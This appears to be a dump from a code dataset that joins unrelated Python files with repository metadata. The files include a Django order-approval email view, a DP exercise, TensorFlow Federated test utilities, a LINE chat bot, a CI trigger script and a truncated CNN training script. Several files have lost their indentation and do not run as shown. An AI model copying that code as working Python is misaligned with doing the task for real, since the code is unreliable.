from apps.orders.models import *
from django.core import mail
from django.template.loader import render_to_string
connection = mail.get_connection()
connection.open()
class ProfileView(ListView):
template_name = 'profile.html'
model = Order
# paginate_by = 5
def get_queryset(self):
pass
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super().get_context_data(**kwargs)
        # Add in QuerySets of the open and completed orders
context['OrderFalse'] = Order.objects.filter(end=False).order_by('-id')
context['OrderTrue'] = Order.objects.filter(end=True).order_by('-id')
return context
def post(self, request, *args, **kwargs):
print(self.request.POST)
if self.request.method == "POST":
order_id = self.request.POST.get('order_id')
objects = Order.objects.get(pk=order_id)
print(objects.email)
email = objects.email
message = render_to_string('message/positive_message.html', {})
message2 = render_to_string('message/negative_message.html', {})
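            # materialExampleRadios carries the decision: '1' approves the order, '2' rejects it; both mark the order finished and email the customer.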
if self.request.POST.get('materialExampleRadios') == '1':
# Order.objects.update(end=True)
Order.objects.filter(pk=order_id).update(flag = 'Одобрено', end=True)
with mail.get_connection() as connection:
msg = mail.EmailMessage(
'Заказ трансфера по испанни', message,
'daskevichvladislav25@gmail.com', [email],
connection=connection,
)
msg.content_subtype = "html"
msg.send()
print("Отправлено одобрение")
return redirect('/')
elif self.request.POST.get('materialExampleRadios') == '2':
# Order.objects.update()
# Order.objects.update(flag = 'Отклонено')
Order.objects.filter(pk=order_id).update(flag = 'Отклонено',end=True)
with mail.get_connection() as connection:
msg = mail.EmailMessage(
'Заказ трансфера по испанни', message2,
'daskevichvladislav25@gmail.com', [email],
connection=connection,
)
msg.content_subtype = "html"
msg.send()
print("Отправлено отказ")
return redirect('/')
|
[
"dashkevich_v@ukr.net"
] |
dashkevich_v@ukr.net
|
766840ecca2b4badf80dd3693e85dd3563f8ecaa
|
9738a5c6f1a0ff018da89d6385c22ef0d566fd89
|
/dynamic8-5.py
|
6e932681be31d6e5f93390d26340b9f1ba8e7925
|
[] |
no_license
|
clearwater92/Algorithm
|
348550a706edd05bb8d31d65d48029126b50e623
|
d4d4b66a549ed79528f05aaf89cf7aa01d95dad2
|
refs/heads/main
| 2023-01-20T12:42:26.161955
| 2020-12-03T12:53:23
| 2020-12-03T12:53:23
| 305,384,185
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
###
# Problem from p.217 of the textbook "이것이 코딩테스트다" (This Is Coding Test).
###
import sys
x = int(sys.stdin.readline().rstrip())
d = [0] * 30001
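# d[i] = minimum number of operations needed to reduce i down to 1, where each operation subtracts 1 or divides by 2, 3, or 5 (when divisible).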
for i in range(2, x + 1):
    d[i] = d[i - 1] + 1  # follow the recurrence: one more operation than d[i - 1] (i.e., subtract 1)
if i % 2 == 0:
        d[i] = min(d[i], d[i // 2] + 1)  # check whether dividing by 2 needs fewer operations than subtracting 1
if i % 3 == 0:
d[i] = min(d[i], d[i // 3] + 1)
if i % 5 == 0:
d[i] = min(d[i], d[i // 5] + 1)
print(d[x])
|
[
"clearwater92@naver.com"
] |
clearwater92@naver.com
|
104fc669d2af9fa208c4aed1d720c01d359a05f9
|
e98f2775d0b7b9aca26e4ef6a3c08ca0100a1442
|
/tensorflow_federated/python/core/backends/mapreduce/test_utils.py
|
f1aeca67ea8ccadf1f89de7152c7f2c39569ec29
|
[
"Apache-2.0"
] |
permissive
|
sgpohlj87/federated
|
54131d8e62a3df1b0bb396d11ba6e6a2e1ada11d
|
ca179ac0e2c0cf9c33169d13fbb44668cbab6982
|
refs/heads/master
| 2020-07-18T22:34:06.001195
| 2019-09-03T22:12:33
| 2019-09-03T22:13:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,890
|
py
|
# Lint as: python2, python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils that support unit tests in this component."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow as tf
import tensorflow_federated as tff
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.backends.mapreduce import canonical_form
from tensorflow_federated.python.core.impl.compiler import building_blocks
def get_temperature_sensor_example():
"""Constructs `canonical_form.CanonicalForm` for temperature sensors example.
The temperature sensor example computes the fraction of sensors that report
temperatures over the threshold.
Returns:
An instance of `canonical_form.CanonicalForm`.
"""
@computations.tf_computation
def initialize():
return {'num_rounds': tf.constant(0)}
# The state of the server is a singleton tuple containing just the integer
# counter `num_rounds`.
server_state_type = computation_types.NamedTupleType([('num_rounds', tf.int32)
])
@computations.tf_computation(server_state_type)
def prepare(state):
return {'max_temperature': 32.0 + tf.cast(state.num_rounds, tf.float32)}
# The initial state of the client is a singleton tuple containing a single
# float `max_temperature`, which is the threshold received from the server.
client_state_type = computation_types.NamedTupleType([('max_temperature',
tf.float32)])
# The client data is a sequence of floats.
client_data_type = computation_types.SequenceType(tf.float32)
@computations.tf_computation(client_data_type, client_state_type)
def work(data, state):
"""See the `canonical_form.CanonicalForm` definition of `work`."""
def fn(s, x):
return {
'num': s['num'] + 1,
'max': tf.maximum(s['max'], x),
}
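    # Fold over the local temperature readings: count them and track the running maximum, seeded at absolute zero (-459.67 F).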
reduce_result = data.reduce({
'num': np.int32(0),
'max': np.float32(-459.67)
}, fn)
return ({
'is_over': reduce_result['max'] > state.max_temperature
}, {
'num_readings': reduce_result['num']
})
# The client update is a singleton tuple with a Boolean-typed `is_over`.
client_update_type = computation_types.NamedTupleType([('is_over', tf.bool)])
# The accumulator for client updates is a pair of counters, one for the
# number of clients over threshold, and the other for the total number of
# client updates processed so far.
accumulator_type = computation_types.NamedTupleType([('num_total', tf.int32),
('num_over', tf.int32)])
@computations.tf_computation
def zero():
return collections.OrderedDict([('num_total', tf.constant(0)),
('num_over', tf.constant(0))])
@computations.tf_computation(accumulator_type, client_update_type)
def accumulate(accumulator, update):
return collections.OrderedDict([
('num_total', accumulator.num_total + 1),
('num_over', accumulator.num_over + tf.cast(update.is_over, tf.int32))
])
@computations.tf_computation(accumulator_type, accumulator_type)
def merge(accumulator1, accumulator2):
return collections.OrderedDict([
('num_total', accumulator1.num_total + accumulator2.num_total),
('num_over', accumulator1.num_over + accumulator2.num_over)
])
@computations.tf_computation(merge.type_signature.result)
def report(accumulator):
return {
'ratio_over_threshold': (tf.cast(accumulator['num_over'], tf.float32) /
tf.cast(accumulator['num_total'], tf.float32))
}
# The type of the combined update is a singleton tuple containing a float
# named `ratio_over_threshold`.
combined_update_type = computation_types.NamedTupleType([
('ratio_over_threshold', tf.float32)
])
@computations.tf_computation(server_state_type, combined_update_type)
def update(state, update):
return ({'num_rounds': state.num_rounds + 1}, update)
return canonical_form.CanonicalForm(initialize, prepare, work, zero,
accumulate, merge, report, update)
def get_mnist_training_example():
"""Constructs `canonical_form.CanonicalForm` for mnist training.
Returns:
An instance of `canonical_form.CanonicalForm`.
"""
model_nt = collections.namedtuple('Model', 'weights bias')
server_state_nt = (collections.namedtuple('ServerState', 'model num_rounds'))
# Start with a model filled with zeros, and the round counter set to zero.
@computations.tf_computation
def initialize():
return server_state_nt(
model=model_nt(weights=tf.zeros([784, 10]), bias=tf.zeros([10])),
num_rounds=tf.constant(0))
server_state_tff_type = server_state_nt(
model=model_nt(weights=(tf.float32, [784, 10]), bias=(tf.float32, [10])),
num_rounds=tf.int32)
client_state_nt = (
collections.namedtuple('ClientState', 'model learning_rate'))
# Pass the model to the client, along with a dynamically adjusted learning
# rate that starts at 0.1 and decays exponentially by a factor of 0.9.
@computations.tf_computation(server_state_tff_type)
def prepare(state):
learning_rate = 0.1 * tf.pow(0.9, tf.cast(state.num_rounds, tf.float32))
return client_state_nt(model=state.model, learning_rate=learning_rate)
batch_nt = collections.namedtuple('Batch', 'x y')
batch_tff_type = batch_nt(x=(tf.float32, [None, 784]), y=(tf.int32, [None]))
dataset_tff_type = computation_types.SequenceType(batch_tff_type)
model_tff_type = model_nt(
weights=(tf.float32, [784, 10]), bias=(tf.float32, [10]))
client_state_tff_type = client_state_nt(
model=model_tff_type, learning_rate=tf.float32)
loop_state_nt = collections.namedtuple('LoopState', 'num_examples total_loss')
update_nt = collections.namedtuple('Update', 'model num_examples loss')
stats_nt = collections.namedtuple('Stats', 'num_examples loss')
  # Train the model locally, emit the locally-trained model and the number of
# examples as an update, and the average loss and the number of examples as
# local client stats.
@computations.tf_computation(dataset_tff_type, client_state_tff_type)
def work(data, state): # pylint: disable=missing-docstring
model_vars = model_nt(
weights=tf.Variable(initial_value=state.model.weights, name='weights'),
bias=tf.Variable(initial_value=state.model.bias, name='bias'))
with tf.control_dependencies([tf.global_variables_initializer()]):
init_model = tf.group(
tf.assign(model_vars.weights, state.model.weights),
tf.assign(model_vars.bias, state.model.bias))
optimizer = tf.train.GradientDescentOptimizer(state.learning_rate)
@tf.function
def reduce_fn(loop_state, batch):
pred_y = tf.nn.softmax(
tf.matmul(batch.x, model_vars.weights) + model_vars.bias)
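      # Cross-entropy between the one-hot labels and the softmax predictions, averaged over the batch.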
loss = -tf.reduce_mean(
tf.reduce_sum(
tf.one_hot(batch.y, 10) * tf.log(pred_y), reduction_indices=[1]))
with tf.control_dependencies([optimizer.minimize(loss)]):
return loop_state_nt(
num_examples=loop_state.num_examples + 1,
total_loss=loop_state.total_loss + loss)
with tf.control_dependencies([init_model]):
loop_state = data.reduce(
loop_state_nt(num_examples=0, total_loss=np.float32(0.0)), reduce_fn)
num_examples = loop_state.num_examples
total_loss = loop_state.total_loss
with tf.control_dependencies([num_examples, total_loss]):
loss = total_loss / tf.cast(num_examples, tf.float32)
return (update_nt(model=model_vars, num_examples=num_examples, loss=loss),
stats_nt(num_examples=num_examples, loss=loss))
accumulator_nt = update_nt
# Initialize accumulators for aggregation with zero model and zero examples.
@computations.tf_computation
def zero():
return accumulator_nt(
model=model_nt(weights=tf.zeros([784, 10]), bias=tf.zeros([10])),
num_examples=tf.constant(0),
loss=tf.constant(0.0, dtype=tf.float32))
update_tff_type = update_nt(
model=model_tff_type, num_examples=tf.int32, loss=tf.float32)
accumulator_tff_type = update_tff_type
  # We add an update to an accumulator with the update's model multiplied by the
# number of examples, so we can compute a weighted average in the end.
@computations.tf_computation(accumulator_tff_type, update_tff_type)
def accumulate(accumulator, update):
scaling_factor = tf.cast(update.num_examples, tf.float32)
scaled_model = tf.nest.map_structure(lambda x: x * scaling_factor,
update.model)
return accumulator_nt(
model=tf.nest.map_structure(tf.add, accumulator.model, scaled_model),
num_examples=accumulator.num_examples + update.num_examples,
loss=accumulator.loss + update.loss * scaling_factor)
# Merging accumulators does not involve scaling.
@computations.tf_computation(accumulator_tff_type, accumulator_tff_type)
def merge(accumulator1, accumulator2):
return accumulator_nt(
model=tf.nest.map_structure(tf.add, accumulator1.model,
accumulator2.model),
num_examples=accumulator1.num_examples + accumulator2.num_examples,
loss=accumulator1.loss + accumulator2.loss)
report_nt = accumulator_nt
# The result of aggregation is produced by dividing the accumulated model by
# the total number of examples. Same for loss.
@computations.tf_computation(accumulator_tff_type)
def report(accumulator):
scaling_factor = 1.0 / tf.cast(accumulator.num_examples, tf.float32)
scaled_model = model_nt(
weights=accumulator.model.weights * scaling_factor,
bias=accumulator.model.bias * scaling_factor)
return report_nt(
model=scaled_model,
num_examples=accumulator.num_examples,
loss=accumulator.loss * scaling_factor)
report_tff_type = accumulator_tff_type
metrics_nt = collections.namedtuple('Metrics', 'num_rounds num_examples loss')
# Pass the newly averaged model along with an incremented round counter over
# to the next round, and output the counters and loss as server metrics.
@computations.tf_computation(server_state_tff_type, report_tff_type)
def update(state, report):
num_rounds = state.num_rounds + 1
return (server_state_nt(model=report.model, num_rounds=num_rounds),
metrics_nt(
num_rounds=num_rounds,
num_examples=report.num_examples,
loss=report.loss))
return canonical_form.CanonicalForm(initialize, prepare, work, zero,
accumulate, merge, report, update)
def construct_example_training_comp():
"""Constructs a `tff.utils.IterativeProcess` via the FL API."""
np.random.seed(0)
sample_batch = collections.OrderedDict([('x',
np.array([[1., 1.]],
dtype=np.float32)),
('y', np.array([[0]],
dtype=np.int32))])
def model_fn():
"""Constructs keras model."""
keras_model = tf.keras.models.Sequential([
tf.keras.layers.Dense(
1,
activation=tf.nn.softmax,
kernel_initializer='zeros',
input_shape=(2,))
])
def loss_fn(y_true, y_pred):
return tf.reduce_mean(
tf.keras.losses.sparse_categorical_crossentropy(y_true, y_pred))
keras_model.compile(
loss=loss_fn,
optimizer=tf.keras.optimizers.SGD(learning_rate=0.01),
metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])
return tff.learning.from_compiled_keras_model(keras_model, sample_batch)
return tff.learning.build_federated_averaging_process(model_fn)
def computation_to_building_block(comp):
return building_blocks.ComputationBuildingBlock.from_proto(
comp._computation_proto) # pylint: disable=protected-access
|
[
"tensorflow.copybara@gmail.com"
] |
tensorflow.copybara@gmail.com
|
0a88a90c2b0b47891884919f717aa1f326ee62a0
|
3dd32d9430d482a2116ec6ca213fe7cb46920f23
|
/eval-data/word_translation/merge-wiktionary-dicts.py
|
1116ee1bb465b54045f87fa90066ccd9a636b601
|
[] |
no_license
|
begab/multilingual-embeddings-eval-portal
|
8cc6832afd1d2143bd6f8643c4812a1d90369b34
|
83821717dbc9031f3dee9bffbda719090bb3aa74
|
refs/heads/master
| 2020-07-06T09:21:48.260270
| 2019-08-18T15:06:12
| 2019-08-18T15:06:12
| 202,967,573
| 0
| 0
| null | 2019-08-18T06:20:42
| 2019-08-18T06:20:41
| null |
UTF-8
|
Python
| false
| false
| 1,252
|
py
|
import shutil
import io
import os
import glob
# twelve: desired_langs = set('bg,cs,da,de,el,en,es,fi,fr,hu,it,sv'.split(','))
# fifty nine:
desired_langs = set("bg|cs|da|de|el|en|es|fi|fr|hu|it|sv|zh|af|ca|iw|cy|ar|ga|zu|et|gl|id|ru|nl|pt|la|tr|ne|lv|lt|tg|ro|is|pl|yi|be|hy|hr|jw|ka|ht|fa|mi|bs|ja|mg|tl|ms|uz|kk|sr|mn|ko|mk|so|uk|sl|sw".split('|'))
processed = set()
test_file = io.open('wiktionary.fifty_nine.test/dictionary', encoding='utf8', mode='w')
dev_file = io.open('wiktionary.fifty_nine.dev/dictionary', encoding='utf8', mode='w')
translations_counter = 0
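# Translation pairs are alternated between the test and dev dictionaries (even counter -> test, odd -> dev) for a roughly 50/50 split.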
for filename in glob.glob('wiktionary.*-*'):
if filename.endswith('dev') or filename.endswith('test'): continue
print 'processing', filename
lang1, lang2 = filename[-5:-3], filename[-2:]
if lang1 not in desired_langs or lang2 not in desired_langs: continue
processed.add( (lang1,lang2,) )
if (lang2,lang1,) in processed: continue
for line in io.open(filename, encoding='utf8'):
word1, word2 = line.strip().split(' ||| ')
line = u'{}:{} ||| {}:{}\n'.format(lang1, word1, lang2, word2)
translations_counter += 1
if translations_counter % 2 == 0:
test_file.write(line)
else:
dev_file.write(line)
test_file.close()
dev_file.close()
|
[
"wammar@cs.cmu.edu"
] |
wammar@cs.cmu.edu
|
ae3dc2f7bf203c611851ed1cdfa6151cfb952a15
|
f07a42f652f46106dee4749277d41c302e2b7406
|
/Data Set/bug-fixing-1/c748512c4c45e257bc625ccf036e18c86d69f1c8-<main>-fix.py
|
759edf1deb6fc8e4fa82cf7d84981a26157ee87e
|
[] |
no_license
|
wsgan001/PyFPattern
|
e0fe06341cc5d51b3ad0fe29b84098d140ed54d1
|
cc347e32745f99c0cd95e79a18ddacc4574d7faa
|
refs/heads/main
| 2023-08-25T23:48:26.112133
| 2021-10-23T14:11:22
| 2021-10-23T14:11:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,832
|
py
|
def main():
'Main program body.'
api_key = get_api_key()
parser = argparse.ArgumentParser(description='Start a new Shippable run.')
parser.add_argument('project', metavar='account/project', help='Shippable account/project')
target = parser.add_mutually_exclusive_group()
target.add_argument('--branch', help='branch name')
target.add_argument('--run', metavar='ID', help='Shippable run ID')
parser.add_argument('--key', metavar='KEY', default=api_key, required=(not api_key), help='Shippable API key')
parser.add_argument('--env', nargs=2, metavar=('KEY', 'VALUE'), action='append', help='environment variable to pass')
if argcomplete:
argcomplete.autocomplete(parser)
args = parser.parse_args()
headers = dict(Authorization=('apiToken %s' % args.key))
data = dict(projectFullNames=args.project)
url = 'https://api.shippable.com/projects'
response = requests.get(url, data, headers=headers)
if (response.status_code != 200):
raise Exception(response.content)
result = response.json()
if (len(result) != 1):
raise Exception(('Received %d items instead of 1 looking for %s in:\n%s' % (len(result), args.project, json.dumps(result, indent=4, sort_keys=True))))
project_id = response.json()[0]['id']
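    # Build the newBuild payload: forwarded --env variables plus either a branch name or an existing run ID.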
data = dict(globalEnv=dict(((kp[0], kp[1]) for kp in (args.env or []))))
if args.branch:
data['branchName'] = args.branch
elif args.run:
data['runId'] = args.run
url = ('https://api.shippable.com/projects/%s/newBuild' % project_id)
response = requests.post(url, json=data, headers=headers)
if (response.status_code != 200):
raise Exception(('HTTP %s: %s\n%s' % (response.status_code, response.reason, response.content)))
print(json.dumps(response.json(), indent=4, sort_keys=True))
|
[
"dg1732004@smail.nju.edu.cn"
] |
dg1732004@smail.nju.edu.cn
|
7667e584bd19748364f959b65a717e2d48a22716
|
9951aeb5fc1676e2de41c160ffbcb87054e0276a
|
/hknweb/guide/apps.py
|
83dfa25433ad4c757a86db3ea3961c83b4a94d95
|
[
"MIT"
] |
permissive
|
m1ch43lw4ng/hknweb
|
43f3b0fb22b200f9e470f61d2d109e34921314e0
|
3588c57cdf404d97a3492b6598fc006e86a08cf2
|
refs/heads/master
| 2020-08-30T16:49:45.264238
| 2019-12-01T10:25:01
| 2019-12-01T10:25:01
| 218,436,615
| 0
| 0
|
MIT
| 2019-10-30T03:34:00
| 2019-10-30T03:33:59
| null |
UTF-8
|
Python
| false
| false
| 90
|
py
|
from django.apps import AppConfig
class GuideConfig(AppConfig):
name = 'guide'
|
[
"nfigueira@berkeley.edu"
] |
nfigueira@berkeley.edu
|
4aa5280b547401299b48b1530fdc3f5809bebc5e
|
58f28413ba2b67d169e52b3968a41c8dccf02c57
|
/squarebot.py
|
c55b62ac13b6c65504d9836de9684b5de1af75df
|
[] |
no_license
|
zelebez6969/zelebezsbpy3
|
4d9c07276619e9f323feb6654a19dd6f2a03bdf6
|
4357a5149d31ff29a715b01101ebd69751a2f60e
|
refs/heads/master
| 2021-05-11T19:56:25.358077
| 2018-01-16T22:43:56
| 2018-01-16T22:43:56
| 117,425,357
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,611
|
py
|
# -*- coding: utf-8 -*-
from linepy import *
import time
line = LINE('EMAIL', 'PASSWORD')
#line = LINE('AUTHTOKEN')
line.log("Auth Token : " + str(line.authToken))
squareChatMid='YOUR_SQUARE_CHAT_MID' # Get manual from line.getJoinableSquareChats('YOUR_SQUARE_MID')
# Initialize OEPoll with LINE instance
oepoll = OEPoll(line)
while True:
try:
eventsSquareChat=oepoll.singleFetchSquareChat(squareChatMid=squareChatMid)
for e in eventsSquareChat:
            if e.createdTime != 0:
ts_old = int(e.createdTime) / 1000
ts_now = int(time.time())
line.log('[FETCH_TIME] ' + str(int(e.createdTime)))
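                # Only react to events created at or after the current fetch time, so older history is not replayed.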
if ts_old >= ts_now:
'''
                    This is a sample BOT implementation for a LINE square.
                    The BOT will notice who leaves the square chat.
                    Commands available:
> hi
> /author
'''
# Receive messages
if e.payload.receiveMessage != None:
payload=e.payload.receiveMessage
line.log('[RECEIVE_MESSAGE]')
msg=payload.squareMessage.message
msg_id=msg.id
receiver_id=msg._from
sender_id=msg.to
if msg.contentType == 0:
text=msg.text
if text.lower() == 'hi':
line.log('%s' % text)
line.sendSquareMessage(squareChatMid, 'Hi too! How are you?')
elif text.lower() == '/author':
line.log('%s' % text)
line.sendSquareMessage(squareChatMid, 'My author is linepy')
# Notified leave Square Chat
elif e.payload.notifiedLeaveSquareChat != None:
payload=e.payload.notifiedLeaveSquareChat
line.log('[NOTIFIED_LEAVE_SQUARE_CHAT]')
                        squareChatMid=payload.squareChatMid
squareMemberMid=payload.squareMemberMid
squareMember=payload.squareMember
displayName=squareMember.displayName
line.sendSquareMessage(squareChatMid, 'Good bye! ' + str(displayName))
else:
pass
except:
line.log("[FETCH_SQUARE] Fetch square chat error")
|
[
"noreply@github.com"
] |
zelebez6969.noreply@github.com
|
4dfceb56898cad5d00fa84665e24c42ab7bf33df
|
12e4cbfd3445d3180565df20d2a7a152bb931ecc
|
/Backend/users/migrations/0004_auto_20210514_0856.py
|
e32b74a819118a4605fa3d5b495e9c610fac4a04
|
[] |
no_license
|
ihonomic/Blog-App-React-Django
|
04dc267e458b69f26ccf8d1b650a7b7708faa72c
|
7c0ae907cd87d5cc261d20bcd14af90cc6aa51dc
|
refs/heads/master
| 2023-08-23T20:54:40.987522
| 2021-10-06T10:29:57
| 2021-10-06T10:29:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 601
|
py
|
# Generated by Django 3.1.4 on 2021-05-14 07:56
from django.db import migrations
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0003_auto_20210513_1716'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='created_at',
field=users.models.CustomDateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='customuser',
name='updated_at',
field=users.models.CustomDateTimeField(auto_now=True),
),
]
|
[
"onosetaleoseghale@gmail.com"
] |
onosetaleoseghale@gmail.com
|
4fed172f79994c420a9d9ad5393b219b95caa670
|
8f133dc975aa970b19c5dad02de758d2cc0cdc5a
|
/Nodes/Journal/journal-newpart.py
|
912abd2a090ffbdbcb5774a396867684dce2b5fb
|
[] |
no_license
|
lerausenco/KBE-Prosjekt
|
25a2b93adb9caf5529abcf6de283deccf1fe90e4
|
13fb0f296018f3df7688f6f23adcd4df4360fb2e
|
refs/heads/main
| 2023-04-09T15:49:49.417139
| 2021-04-26T09:40:54
| 2021-04-26T09:40:54
| 333,350,903
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,039
|
py
|
# NX 1911
# Journal created by lera_ on Tue Apr 13 10:18:08 2021 W. Europe Summer Time
#
import math
import NXOpen
def main() :
theSession = NXOpen.Session.GetSession()
workPart = theSession.Parts.Work
displayPart = theSession.Parts.Display
# ----------------------------------------------
# Menu: File->New...
# ----------------------------------------------
markId1 = theSession.SetUndoMark(NXOpen.Session.MarkVisibility.Visible, "Start")
fileNew1 = theSession.Parts.FileNew()
theSession.SetUndoMarkName(markId1, "New Dialog")
markId2 = theSession.SetUndoMark(NXOpen.Session.MarkVisibility.Invisible, "New")
theSession.DeleteUndoMark(markId2, None)
markId3 = theSession.SetUndoMark(NXOpen.Session.MarkVisibility.Invisible, "New")
fileNew1.TemplateFileName = "model-plain-1-mm-template.prt"
fileNew1.UseBlankTemplate = False
fileNew1.ApplicationName = "ModelTemplate"
fileNew1.Units = NXOpen.Part.Units.Millimeters
fileNew1.RelationType = ""
fileNew1.UsesMasterModel = "No"
fileNew1.TemplateType = NXOpen.FileNewTemplateType.Item
fileNew1.TemplatePresentationName = "Model"
fileNew1.ItemType = ""
fileNew1.Specialization = ""
fileNew1.SetCanCreateAltrep(False)
fileNew1.NewFileName = "C:\\Users\\lera_\\OneDrive\\Dokumenter\\NTNU\\KBE\\KBE-Prosjekt\\Nodes\\Parts\\model2.prt"
fileNew1.MasterFileName = ""
fileNew1.MakeDisplayedPart = True
fileNew1.DisplayPartOption = NXOpen.DisplayPartOption.AllowAdditional
nXObject1 = fileNew1.Commit()
workPart = theSession.Parts.Work # model2
displayPart = theSession.Parts.Display # model2
theSession.DeleteUndoMark(markId3, None)
fileNew1.Destroy()
# ----------------------------------------------
# Menu: Tools->Journal->Stop Recording
# ----------------------------------------------
if __name__ == '__main__':
main()
|
[
"usencolera@gmail.com"
] |
usencolera@gmail.com
|
ab0a2ba6e4d3d375e56ab4ac661c7d7ddf068306
|
ec80f504ab4511e27c7e4afe801b8e6b8ddf6900
|
/examples/ex_cnn_cascade_training_face_detection/12net_detection_training.py
|
0f64a4a441f8628405401d4cb2a8c19f4f58f298
|
[
"MIT"
] |
permissive
|
ssteveminq/deepgaze
|
afdc3aeb7d0b0ba247a3cf5850981f899abb3082
|
6df11f3799b36d7d0d45fbbb77be21eec456ddd4
|
refs/heads/master
| 2021-01-25T10:06:11.775804
| 2019-04-11T18:18:14
| 2019-04-11T18:18:14
| 123,338,160
| 0
| 1
|
MIT
| 2018-02-28T20:23:47
| 2018-02-28T20:23:47
| null |
UTF-8
|
Python
| false
| false
| 12,414
|
py
|
#!/usr/bin/env python
# The MIT License (MIT)
# Copyright (c) 2017 Massimiliano Patacchiola
# https://mpatacchiola.github.io
# https://mpatacchiola.github.io/blog/
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import print_function
import numpy as np
import tensorflow as tf
from six.moves import cPickle as pickle
import cv2 # to visualize a preview
import datetime
import os
def main():
# Load the standard file
image_size = 12
batch_size = 64
patch_size = 5
num_labels = 2
num_channels = 3 # colour
tot_epochs = 10000 # epochs
# Change this path based on your datasets location
pickle_file_positive = "./positive_dataset_12net_98452.pickle"
pickle_file_negative = "./negative_dataset_12net_198081.pickle"
with open(pickle_file_positive, 'rb') as f:
save = pickle.load(f)
train_dataset_positive = save['training_dataset']
train_label_positive = save['training_label']
del save # hint to help gc free up memory
        # Report the shape of the positive training data just loaded
print('Training set', train_dataset_positive.shape, train_label_positive.shape)
with open(pickle_file_negative, 'rb') as f:
save = pickle.load(f)
train_dataset_negative = save['training_dataset']
train_label_negative = save['training_label']
del save # hint to help gc free up memory
        # Report the shape of the negative training data just loaded
print('Training set', train_dataset_negative.shape, train_label_negative.shape)
# Creating the test set taking the first 100 images
test_dataset = np.concatenate((train_dataset_positive[0:100, :, :], train_dataset_negative[0:100, :, :]), axis=0)
test_label = np.concatenate((train_label_positive[0:100, :], train_label_negative[0:100, :]), axis=0)
train_dataset_positive = train_dataset_positive[100:, :, :]
train_dataset_negative = train_dataset_negative[100:, :, :]
train_label_positive = train_label_positive[100:, :]
train_label_negative = train_label_negative[100:, :]
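    # Everything after the first 100 positives/negatives stays available for the random training batches drawn below.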
#Estimating the number of elements in both datasets
total_positive = train_dataset_positive.shape[0]
total_negative = train_dataset_negative.shape[0]
# Normalisation
#train_dataset -= 127
#validation_dataset -= 127
#test_dataset -= 127
#train_dataset /= 255
#validation_dataset /= 255
#test_dataset /= 255
graph = tf.Graph()
with graph.as_default():
tf_initializer = None #tf.random_normal_initializer()
# Input data.
tf_train_dataset = tf.placeholder(tf.float32, shape=(batch_size, image_size, image_size, num_channels))
tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))
tf_test_dataset = tf.placeholder(tf.float32, shape=(None, image_size, image_size, num_channels))
# Conv layer
# [patch_size, patch_size, num_channels, depth]
conv1_weights = tf.get_variable("conv1_12d_w", [3, 3, num_channels, 16], initializer=tf_initializer)
conv1_biases = tf.Variable(tf.zeros([16]), name="conv1_12d_b")
# Dense layer
        # [6*6 * previous_layer_out, num_hidden] wd1
# after pooling the 12x12 image is reduced to size 6x6
dense1_weights = tf.get_variable("dense1_12d_w", [6 * 6 * 16, 16], initializer=tf_initializer)
dense1_biases = tf.Variable(tf.random_normal(shape=[16]), name="dense1_12d_b")
# Output layer
layer_out_weights = tf.get_variable("out_12d_w", [16, num_labels], initializer=tf_initializer)
layer_out_biases = tf.Variable(tf.random_normal(shape=[num_labels]), name="out_12d_b")
# dropout (keep probability)
keep_prob = tf.placeholder(tf.float32)
# Model.
def model(data, _dropout=1.0):
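            # Architecture: 3x3x16 conv + ReLU -> 3x3 max-pool (stride 2) -> local response norm -> dropout -> 16-unit dense + ReLU -> dropout -> 2-way logits.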
X = tf.reshape(data, shape=[-1, image_size, image_size, num_channels])
print("SHAPE X: " + str(X.get_shape())) # Convolution Layer 1
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(X, conv1_weights, strides=[1, 1, 1, 1], padding='SAME'), conv1_biases))
print("SHAPE conv1: " + str(conv1.get_shape()))
# Max Pooling (down-sampling)
pool1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
print("SHAPE pool1: " + str(pool1.get_shape()))
# Apply Normalization
norm1 = tf.nn.lrn(pool1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75)
# Apply Dropout
norm1 = tf.nn.dropout(norm1, _dropout)
# Fully connected layer
dense1 = tf.reshape(norm1, [-1, dense1_weights.get_shape().as_list()[0]]) # Reshape conv3
print("SHAPE dense1: " + str(dense1.get_shape()))
dense1 = tf.nn.relu(tf.matmul(dense1, dense1_weights) + dense1_biases) # Relu
dense1 = tf.nn.dropout(dense1, _dropout)
# Output layer
out = tf.matmul(dense1, layer_out_weights) + layer_out_biases
print("SHAPE out: " + str(out.get_shape()))
